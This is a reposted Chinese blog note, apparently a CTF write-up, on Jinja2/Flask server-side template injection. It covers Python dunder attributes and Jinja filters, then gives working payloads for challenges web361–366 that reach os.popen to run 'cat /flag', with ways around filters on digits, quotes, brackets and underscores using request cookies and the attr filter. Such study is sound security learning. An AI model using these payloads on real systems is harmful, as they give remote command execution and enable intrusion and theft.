手机

iphone11大小尺寸是多少？苹果iPhone11和iPhone13的区别是什么？

警方通报辅警执法直播中被撞飞：犯罪嫌疑人已投案

世界资讯：ssti注入

2023-04-29 19:04:22 来源：博客园

笔记:

__class__            类的一个内置属性，表示实例对象的类。 __base__             类型对象的直接基类 __bases__            类型对象的全部基类，以元组形式，类型的实例通常没有属性 __bases__ __mro__              method resolution order，即解析方法调用的顺序；此属性是由类组成的元            组，在方法解析期间会基于它来查找基类。 __subclasses__()     返回这个类的子类集合，每个类都保留一个对其直接子类的弱引用列表。该方法返回一个列表，其中包含所有仍然存在的引用。列表按照定义顺序排列。 __init__             初始化类，返回的类型是function __globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。 __dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里 __getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上，在实例化的对象进行.操作的时候（形如：a.xxx/a.xxx()），都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。 __getitem__()        调用字典中的键值，其实就是调用这个魔术方法，比如a["b"]，就是a.__getitem__("b") __builtins__         内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了，百度都有。 __import__           动态加载类和函数，也就是导入模块，经常用于导入os模块，__import__("os").popen("ls").read()] __str__()            返回描写这个对象的字符串，可以理解成就是打印出来。 url_for              flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__["__builtins__"]含有current_app。 get_flashed_messages flask的一个方法，可以用于得到__builtins__，而且url_for.__globals__["__builtins__"]含有current_app。 lipsum               flask的一个方法，可以用于得到__builtins__，而且lipsum.__globals__含有os模块：{{lipsum.__globals__["os"].popen("ls").read()}} current_app          应用上下文，一个全局变量。 request              可以用于获取字符串来绕过，包括下面这些，引用一下羽师傅的。此外，同样可以获取open函数:request.__init__.__globals__["__builtins__"].open("/proc\self\fd/3").read() request.args.x1        get传参 request.values.x1      所有参数 request.cookies      cookies参数 request.headers      请求头参数 request.form.x1        post传参    (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data) request.data           post传参    (Content-Type:a/b) request.json         post传json  (Content-Type: application/json) config               当前application的所有配置。此外，也可以这样{{ config.__class__.__init__.__globals__["os"].popen("ls").read() }} g                    {{g}}得到

常用的过滤器:

(相关资料图)

int()：将值转换为int类型； float()：将值转换为float类型； lower()：将字符串转换为小写； upper()：将字符串转换为大写； title()：把值中的每个单词的首字母都转成大写； capitalize()：把变量值的首字母转成大写，其余字母转小写； trim()：截取字符串前面和后面的空白字符； wordcount()：计算一个长字符串中单词的个数； reverse()：字符串反转； replace(value,old,new)： 替换将old替换为new的字符串； truncate(value,length=255,killwords=False)：截取length长度的字符串； striptags()：删除字符串中所有的HTML标签，如果出现多个空格，将替换成一个空格； escape()或e：转义字符，会将<、>等符号转义成HTML中的符号。显例：content|escape或content|e。 safe()： 禁用HTML转义，如果开启了全局转义，那么safe过滤器会将变量关掉转义。示例： {{"hello"|safe}}； list()：将变量列成列表； string()：将变量转换成字符串； join()：将一个序列中的参数值拼接成字符串。示例看上面payload； abs()：返回一个数值的绝对值； first()：返回一个序列的第一个元素； last()：返回一个序列的最后一个元素； format(value,arags,*kwargs)：格式化字符串。比如：{{ "%s" - "%s"|format("Hello?","Foo!") }}将输出：Helloo? - Foo! length()：返回一个序列或者字典的长度； sum()：返回列表内数值的和； sort()：返回排序后的列表； default(value,default_value,boolean=false)：如果当前变量没有值，则会使用参数中的值来代替。示例：name|default("xiaotuo")----如果name不存在，则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值，如果想使用python的形式判断是否为false，则可以传递boolean=true。也可以使用or来替换。 length()返回字符串的长度，别名是count

web361

思路其实很简单，首先得到空字符串的类，用.__class__就可以得到空字符串类。

得到了空字符串类之后，我们就需要去找基类，这里我们使用__base__来找，当然也可以用__bases__来找全部基类，这道题刚好他的基类就是object，所以直接通过__base__来找。

找到基类后我们就查看基类下的所以类，这里用到__subclasses__()进行查看，我们找到os._wrap_close这个类并且使用这个类中的popen方法。(我们通过[]的下标索引来找到这个类)

接着我们初始化这个类。

然后再找这个类中的所有变量和方法。

然后我们就可以通过popen方法来读取flag文件

payload:{{"".__class__.__base__.__subclasses__()[132].__init__.__globals__["popen"]("cat /flag").read()}}

web362

对于数字2，3进行了过滤

绕过方式一、使用全半角数字进行绕过：（切换的中文输入法里面进行全半角切换）

payload:?name={{"".__class__.__base__.__subclasses__()[１３２].__init__.__globals__["popen"]("cat /flag").read()}}

绕过方法二、使用__builtins__

python2和python3两个版本通用的方法__builtins__代码执行__builtins__ 内建名称空间，内建名称空间有许多名字到对象之间映射，而这些名字其实就是内建函数的名称，对象就是这些内建函数本身。即里面有很多常用的函数。在启动Python解释器后，就可以直接使用一些函数.这些函数称为内建函数，在__builtins__模块中，Python在启动时就直接为我们导入了。准确的说，Python在启动时会首先加载内建名称空间，内建名称空间中有许多名字到对象之间的映射，这些名字就是内建函数的名称，对象就是这些内建函数对象。可以使用dir(builtins)来查看调用方法的列表，然后可以发现__builtins__下有eval，__import__等的函数，因此可以利用此来执行命令。

payload:?name={{x.__init__.__globals__["__builtins__"]["eval"]("__import__("os").popen("cat /flag").read()")}}

web 363

对于单双引号进行了过滤：

使用request进行绕过

payload:?name={{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__("os").popen("cat /flag").read()

web 364

过滤引号和args,这里用cookie传参绕过：

payload:?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}

cookie传参:a=os;b=popen;c=cat /flag

或者

payload:?name={{x.__init__.__globals__[request.cookies.a].eval(request.cookies.b)}}

cookie传参:a=__builtins__;b=__import__("os").popen("cat /flag").read()

web 365

过滤了引号，还有中括号，但request.cookies仍然可以用。

?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}

cookie传参:a=cat /flag

web 366

过滤了下划线。用内置方法lipsum绕过，

payload:?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}

cookie传参:a=__globals__;b=cat /flag

attr用于获取变量：常见于点号(.)被过滤，或者点号(.)和中括号([])都被过滤的情况。

""|attr("__class__")相当于"".__class__

关键词：